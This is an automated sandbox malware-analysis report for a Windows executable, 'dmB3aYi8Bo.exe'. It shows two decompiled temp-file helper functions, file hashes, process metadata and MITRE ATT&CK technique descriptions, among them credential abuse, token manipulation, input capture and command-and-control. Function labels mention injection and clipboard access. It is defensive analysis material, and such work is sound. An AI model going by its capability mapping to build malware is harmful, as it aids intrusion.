Function 012BC695 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BC695(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v524;
				void* __esi;
				WCHAR* _t16;
				intOrPtr _t25;
				int _t27;

				_t27 = 0;
				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && L012B1640( &_v524) != 0) {
					_t16 = PathFindFileNameW( &_v524);
					_t25 = _a4;
					E012BA5D0(_a8 + 0xfffffffd | 0xffffffff, _t16, _t25 + 3, 0, _a8 + 0xfffffffd);
					L012B1947(_t25, "?T", 2);
					 *((char*)(_t25 + 2)) = 0x5c;
					_t27 = 1;
				}
				return _t27;
			}

0x012bc6a9
0x012bc6bf
0x012bc6d8
0x012bc6de
0x012bc6f2
0x012bc6ff
0x012bc706
0x012bc70a
0x012bc70b
0x012bc710

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 012BC6B7
PathFindFileNameW.SHLWAPI(?), ref: 012BC6D8

Part of subcall function 012BA5D0: WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 012BA5EC

Strings

cab, xrefs: 012BC6AC

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: FileName$ByteCharFindMultiPathTempWide
String ID: cab
API String ID: 463298389-1787492089
Opcode ID: 7a5a193569c7f68704403b59e17a7fdbb3cf7993af7e928aafea02ce6f66bf13
Instruction ID: e3a72118b6c76986ab0b5de52fc61b406c9f175ef4d8d3d602f6a453b0b7d29c
Opcode Fuzzy Hash: 7a5a193569c7f68704403b59e17a7fdbb3cf7993af7e928aafea02ce6f66bf13
Instruction Fuzzy Hash: 7701F932A0021567DB209A68DC4EFDB7BACAF057A0F044351BA65E71C1DB70E94487D0

Uniqueness

Uniqueness Score: -1.00%

Function 012B975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B975A(WCHAR* __ecx, WCHAR* __edx) {
				short _v524;
				WCHAR* _t12;
				WCHAR* _t13;

				_t12 = __edx;
				_t13 = __ecx;
				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
					L5:
					return 0;
				}
				if(_t13 == 0) {
					_t13 = L"tmp";
				}
				if(GetTempFileNameW( &_v524, _t13, 0, _t12) == 0) {
					goto L5;
				} else {
					return 1;
				}
			}

0x012b9771
0x012b9773
0x012b9781
0x012b97a5
0x00000000
0x012b97a5
0x012b9785
0x012b9787
0x012b9787
0x012b979f
0x00000000
0x012b97a1
0x00000000
0x012b97a1

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 012B9775
GetTempFileNameW.KERNEL32(?,?,00000000), ref: 012B9797

Strings

tmp, xrefs: 012B9787

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: tmp
API String ID: 3285503233-753892680
Opcode ID: 28f19701bf76496a817c765013dbc0fe72ea70078c564e62ae466a671d638afb
Instruction ID: 1d609d6d7cf257b71e6c18b47f9043d2bf92c6f4519376bc111f20ae24ee42e4
Opcode Fuzzy Hash: 28f19701bf76496a817c765013dbc0fe72ea70078c564e62ae466a671d638afb
Instruction Fuzzy Hash: 09E0EDF6D5022523EF341A29AC8EFEB37AC9BC1795F000171AF25E7185E821D8809BA0

Uniqueness

Uniqueness Score: -1.00%

Target ID:	0
Start time:	03:53:44
Start date:	27/08/2022
Path:	C:\Users\user\Desktop\dmB3aYi8Bo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dmB3aYi8Bo.exe"
Imagebase:	0x12b0000
File size:	187392 bytes
MD5 hash:	56AA277081075438C3DBBEF841299172
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dmB3aYi8Bo.bin

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Protection of GUI

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: dmB3aYi8Bo.exePID: 6564, Parent PID: 4240

General

Chronological Activities

Disassembly

Analysis Process: dmB3aYi8Bo.exePID: 6564, Parent PID: 4240COMMON

Execution Graph

Windows Analysis Report
dmB3aYi8Bo.bin

Function 012B6FBD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63
COMMON

Function 012B18F2 Relevance: 3.0, APIs: 2, Instructions: 14
memoryCOMMON

Function 012C226C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126
sleepCOMMON

Function 012BCB93 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
COMMON

Function 012B9700 Relevance: 3.0, APIs: 2, Instructions: 29
fileCOMMON

Function 012C1DD2 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Function 012B6814 Relevance: 1.5, APIs: 1, Instructions: 12
networkCOMMON

Function 012C976D Relevance: 20.2, APIs: 13, Instructions: 695
networkCOMMONCrypto

Function 012BBAD7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 106
libraryloaderprocessCOMMON

Function 012CAFE4 Relevance: 14.6, APIs: 5, Strings: 3, Instructions: 648
synchronizationnetworkCOMMONCrypto

Function 012BD44A Relevance: 10.6, APIs: 7, Instructions: 106
sleepfilesynchronizationCOMMON

Function 012B4E98 Relevance: 10.6, APIs: 7, Instructions: 60
threadCOMMON

Function 012C2F67 Relevance: 9.1, APIs: 6, Instructions: 102
processCOMMON

Function 012C2C77 Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Function 012C87ED Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188
COMMON

Function 012CA8EB Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Function 012BD399 Relevance: 7.6, APIs: 5, Instructions: 56
fileCOMMON

Function 012CA854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
windowCOMMON

Function 012B504C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
libraryloaderCOMMON

Function 012B30C0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164
stringCOMMON

Function 012B8BB3 Relevance: 6.1, APIs: 4, Instructions: 95
memoryinjectionCOMMON

Function 012C2D9E Relevance: 6.1, APIs: 4, Instructions: 53
libraryloaderCOMMON

Function 012B1B1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Function 012C80B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
shutdownCOMMON

Function 012C2BCD Relevance: 4.6, APIs: 3, Instructions: 59
nativethreadCOMMON

Function 012C7B5C Relevance: 3.0, APIs: 2, Instructions: 38
COMMON

Function 012D022B Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Function 012B3E69 Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 012C1A81 Relevance: 1.5, APIs: 1, Instructions: 4
shutdownCOMMON

Function 012B636F Relevance: .3, Instructions: 258
COMMONCrypto

Function 012B6601 Relevance: .2, Instructions: 231
COMMONCrypto

Function 012B5F21 Relevance: .2, Instructions: 226
COMMONCrypto

Function 012B5B49 Relevance: .2, Instructions: 209
COMMONCrypto

Function 012B6177 Relevance: .2, Instructions: 201
COMMONCrypto

Function 012B5D60 Relevance: .2, Instructions: 186
COMMONCrypto

Function 012B1BC2 Relevance: .1, Instructions: 71
COMMONCrypto

Function 012CDE5D Relevance: 43.8, APIs: 29, Instructions: 314
COMMON

Function 012C1097 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 86
libraryloaderCOMMON

Function 012CEB9B Relevance: 24.2, APIs: 16, Instructions: 191
registrymemorywindowCOMMON

Function 012C1FF5 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 191
sleepstringsynchronizationCOMMON

Function 012C50BC Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 169
networkCOMMON

Function 012CF213 Relevance: 22.6, APIs: 15, Instructions: 131
windowCOMMON

Function 012B78EC Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 012C4060 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 189
COMMON

Function 012C72D8 Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 253
COMMON

Function 012CEDF6 Relevance: 18.1, APIs: 12, Instructions: 75
filesynchronizationthreadCOMMON